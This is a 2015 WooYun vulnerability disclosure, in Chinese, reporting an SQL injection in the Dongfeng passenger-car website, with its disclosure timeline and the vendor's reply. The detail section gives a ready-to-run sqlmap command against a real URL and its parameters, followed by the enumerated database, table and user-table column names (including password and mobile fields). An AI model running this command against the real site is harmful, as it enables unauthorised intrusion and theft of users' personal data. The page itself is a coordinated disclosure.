当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145852

漏洞标题:东风乘用车官方网站(东风风神)SQL注射漏洞/影响10库

相关厂商:东风日产乘用车公司

漏洞作者: 冷白开。

提交时间:2015-10-10 18:03

修复时间:2015-11-26 08:58

公开时间:2015-11-26 08:58

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-10: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-11-01: 细节向普通白帽子公开
2015-11-11: 细节向实习白帽子公开
2015-11-26: 细节向公众公开

简要描述:

那么多东风的站。。。我都看晕了

详细说明:

sqlmap.py -u "http://www.dfpv.com.cn/fs/pressroom_retrieve/1444378873.html" --data "email=safe3q%40gmail.com&realname=88952634" --dbs

1.png

脱出数据证明问题

available databases [10]:
[*] activityax7
[*] ax7game
[*] dealerdfyl
[*] information_schema
[*] jac_weixin
[*] mysql
[*] qrvote
[*] shen
[*] shen_a30
[*] shen_langsong
Database: dealerdfyl
[33 tables]
+-----------------+
| tAbout |
| tActivity |
| tAgency |
| tBoard |
| tCar |
| tCarAgency |
| tContact |
| tDna |
| tHistory |
| tHonor |
| tJob |
| tJoin |
| tMaterial |
| tModel |
| tModelAgency |
| tModelMaterial |
| tModelSale |
| tPictures |
| tPromotion |
| tService |
| tSession |
| tStaff |
| tTypes |
| tUser |
| tUserAgency |
| tUserEmail |
| tUserLast |
| tUserMobile |
| tVisual |
| tVisualBAK |
| tVisualSpots |
| tVisualSpotsBAK |
| tagency |
+-----------------+
Database: dealerdfyl
Table: tUser
[14 columns]
+----------+-----------------------+
| Column | Type |
+----------+-----------------------+
| agency | int(11) unsigned |
| avator | varchar(255) |
| city | int(4) unsigned |
| email | varchar(63) |
| gender | enum('male','female') |
| id | int(10) unsigned |
| mobile | varchar(31) |
| name | varchar(31) |
| nick | varchar(16) |
| parent | int(11) unsigned |
| pwd | char(32) |
| role | tinyint(1) unsigned |
| status | tinyint(1) unsigned |
| updateAt | int(10) unsigned |
+----------+-----------------------+

漏洞证明:

综上

修复方案:

你们懂

版权声明:转载请注明来源 冷白开。@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-12 08:56

厂商回复:

漏洞不是我司负责范围,请乌云联系《东风乘用车公司》。@疯狗

最新状态:

暂无


漏洞评价:

评价